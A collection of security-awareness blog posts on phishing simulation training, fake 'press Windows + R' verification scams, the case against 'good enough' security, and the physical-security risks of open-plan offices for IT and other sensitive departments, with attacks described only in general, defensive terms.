Phishing simulation that actually teaches something

 

Everyone can be fooled. The goal is to build good habits, not to expose people. Everyone — including experienced IT staff — can fall for targeted phishing; the goal is to reduce click rates year over year. Ten fewer clicks in 2026 than in 2025 can represent a major improvement and a measurable reduction in risk.

Start with simple exercises that include clear warning signs to build confidence. Conduct these simple simulations regularly – they create awareness, and those who click on them should be prioritized for additional training. When a small group keeps clicking repeatedly, that’s where education needs to start. These users often highlight where communication, awareness, or process gaps still exist. This is exactly where things tend to go wrong in real situations.

Gradually increase the realism by removing the obvious errors and using internal context. Follow up repeated clicks with quick, friendly 1:1 guidance and short micro-training, not sanctions.

There’s no real value in designing a simulation that fools 99% of employees. People might learn something from it, but the result is usually frustration and low motivation. Most users can detect even highly convincing phishing attempts – if they get just a couple of minutes of proper guidance first.

A practical example that works well in training sessions:
An employee receives an email that appears to come from a logistics supplier. One wrong click opens a form for “account verification.” It looks harmless, but behind the form a small script installs a remote access tool. Within two hours, the attacker has reused the same credentials to reach a server containing customer information. It all started with one click – not with bad intent, just a moment of inattention.

The point isn’t to scare anyone, but to show how little it takes – and how much safer things become when emails are reported instead of clicked.

To help people spot them in practice, here are some common warning signs:
• Unknown or mismatched sender: The email address doesn’t match the company name or domain.
• Suspicious link preview: The destination domain is different from what the text shows.
• Requests for passwords or codes: No legitimate service will ever ask for credentials by email.
• Urgent tone or threats: Messages pushing immediate action often aim to trigger panic.
• Unexpected or suspicious attachments: Files you didn’t ask for, especially with names like “urgent_invoice.doc” or “security_update.zip.”
• Strange or incomplete signature: Missing name, title, or contact info can signal a fake sender.
• Unusual time of day: Emails sent late at night, during weekends, or holidays can be suspicious.
• Unfamiliar tone or wording: The writing style doesn’t match how the person usually communicates.
• Generic greeting: “Dear user” or “Hello colleague” instead of your actual name.
• Inconsistent branding: Logos, colors, or formatting that look slightly off.
• Email marked as “external” but looks internal: A trick often used to bypass trust filters.
• Unusual requests: Asking for gift cards, wire transfers, or sensitive internal data.

Spotting just one of these warning signs early can prevent a full-scale incident.

Phishing awareness is part of Zero Trust in practice — always verify, even if the sender looks familiar, and make reporting part of everyday security hygiene.

Building awareness isn’t about perfection — it’s about progress. Every report instead of a click makes the organization stronger and more resilient.

Fake verification scams: why “press Windows + R” is a trap

 

Introduction

No legitimate site asks you to press Windows + R and paste commands. This post explains the risk and how to prevent it.

What it is

Fake verification pages mimic CAPTCHA or security checks. They tell users to press Windows + R, paste a command, and press Enter — executing code copied to the clipboard.

How the attack works

The page copies a command to the clipboard. When pasted into Run, it executes via CMD or PowerShell and often downloads malware, opens a reverse shell, or steals credentials.

Why it succeeds

It abuses trust and urgency. Users think Run is harmless, the page looks official, and many endpoints still allow local command execution.

Mitigations (technical level)

• Remove local admin rights.

• Limit local execution with least-privilege access.

• Block unknown or unsigned scripts with AppLocker or similar.

User training

• Never paste commands from webpages into Run, terminal, or PowerShell.

• Communicate this rule via your normal channels (meeting, chat, email).

Good enough cyber security – or do you want to be among the best?

 

A lot of people say they have good enough cyber security.
But in cyber security, good enough is often the first step toward not enough.

Is it an antivirus that scores average in tests, or one that ranks in the top three?
Is it using multi-factor authentication only for management, but not for the operations team?
Or a firewall that allows everything, just to make things work?

Many still believe that no one is interested in them.
But most attacks aren’t targeted – they’re automated.
They look for weak spots, and good enough is often exactly that.

We see it every week: an unpatched system, an old password, or an open rule that was never reviewed.
It works – until the day it doesn’t.

Think about it this way:
Would management say it’s fine to show up at work in swimwear twice a year,
while everyone else wears suits the rest of the time?
Probably not.
Dress code is 100% – not good enough.

Security should be treated the same way.
You either have control, or you don’t.
Good enough doesn’t protect you as well as it should – it only feels comfortable until something happens.

Threat actors don’t stop because you’re average,
but they might move on when you’re better than your neighbor.

The best organizations treat security as a competitive advantage.
They build trust, protect value, and show that quality doesn’t stop at minimum compliance.

Security isn’t about being perfect – it’s about getting a little better every week.
Attackers only need one weakness.
Your job is to close every one of them –
just like you lock every door when you leave the office, not nine out of ten.

So next time someone says good enough, ask:
Good enough for whom – you, or the attacker?

And remember: you don’t need big projects to improve.
Start small – update one system, tighten one firewall rule, remove one unnecessary access.
Do it every week.

Or take inspiration from a few simple CIS principles:

• Know your assets. You can’t protect what you don’t know exists.

• Keep systems updated. Most attacks exploit known vulnerabilities.

• Limit access. Give only what’s needed – that’s how least privilege and Zero Trust start.

• Log and monitor. What you don’t see, and don’t log, won’t be detected or stopped.

Real security isn’t built in a single project.
It’s built through small, consistent actions – logged, learned, and improved.
One step, one log, one improvement at a time.

And one more thing:
Don’t just choose the cheapest antivirus, firewall, or SOC provider.
Run your own tests and check the quality before you trust it –
unless you already know someone who has tested it thoroughly.

Good security isn’t about saving money; it’s about knowing what actually works.

Why IT departments should not sit in open-plan offices

 

Open-plan offices have become a trend in recent years. The idea is to promote collaboration, flexibility, and communication. And there is no doubt that this setup has benefits:

• collaboration becomes easier, since you can quickly ask the colleague next to you

• knowledge sharing happens naturally and informally

• it builds team spirit and a sense of community

• communication flows faster, and problems can often be solved on the spot

For many departments this can work well. But for an IT department, an open-plan office is directly risky.

The risks of open spaces

IT staff handle information that is critical to the business: system configurations, logs, network diagrams, and security incidents. When these tasks are carried out in an open office environment, the risk of unauthorized access increases significantly.

This is particularly important for functions such as the CISO or the Security Operations Center (SOC), where staff may be dealing with ongoing incidents, threat intelligence, or forensic data. Such information should never be visible or overheard in an environment where guests, contractors, or even other employees without clearance can pass by.

The classic example is “shoulder surfing” – someone glancing at sensitive content on a screen. Equally problematic is the risk that confidential conversations are overheard. 

Another often overlooked risk is sound leakage: in open-plan offices, a customer on the phone may also hear conversations from nearby desks, unless very advanced headsets with strong noise isolation are used. This means sensitive discussions between colleagues can unintentionally be shared with external parties.

ISO 27001:2022 – why open-plan is a problem

ISO 27001:2022 highlights several controls that all point to the same issue: sensitive information must be protected from unauthorized access. Open-plan offices make this nearly impossible.

• Physical security perimeters

• Physical entry controls

• Clear desk and clear screen

• Information security in supplier relationships

Real-life scenarios show how quickly security can fail in relation to these controls:

• a visitor waiting for a meeting can easily photograph notes, diagrams, or printouts left on a desk

• a contractor or job candidate passing by may glimpse a screen just as someone opens an attachment, without realizing the first page contains confidential information

• when an IT employee locks their computer to get a coffee or use the restroom, they may leave documents on their desk – one quick smartphone photo is enough to capture that information permanently

• suppliers or service providers moving through the office may unintentionally gain visibility into data they should never have access to

It is also worth noting that other standards and frameworks – such as GDPR, NIS2, NIST, CIS Controls, and NSM grunnprinsipper (Norway) – point in the same direction, emphasizing the need for physical protection of sensitive information and controlled access to workplaces.

Other departments should also reconsider

It is not only IT that should think twice about open-plan setups. Departments handling sensitive information face similar risks, for example:

• HR – managing personal data, employment contracts, and health-related information

• Legal/Compliance – working with confidential documents and internal investigations

• Finance – handling accounting, banking, and budget data

• Executive/Strategy – discussing mergers, strategic plans, or other confidential information

• Research & Development – working on products, designs, or innovations that may be patented or involve intellectual property

• Customer support – handling customer records, tickets, and sometimes payment details

• Project teams for mergers & acquisitions – where leaks can have major financial consequences

All these functions risk exposing information if their workspaces are too open and accessible.

Real-world observations

When walking the streets of Oslo or Bergen, I often see offices on the ground floor with large windows facing the street. It is surprising how easy it is to see what people are working on. With today’s smartphone cameras, it takes no effort to take pictures or record video from the sidewalk – or even from a hotel room across the street.

The question is: do these companies think about security at all? It is frighteningly easy for outsiders to gain insight into customer data, accounting systems, or even online banking screens.

Conclusion

Open-plan offices can bring real benefits such as collaboration, flexibility, and stronger team dynamics. But for departments dealing with sensitive information – especially IT – the risks outweigh the benefits.

An IT department should therefore never sit in an open-plan office if guests, contractors, or even passersby can gain visibility. The same applies to HR, Legal, Finance, R&D, Customer Support, and Executive functions.

Physical segregation is not only common sense – it is a requirement for ISO 27001 compliance and a cornerstone of a strong security culture.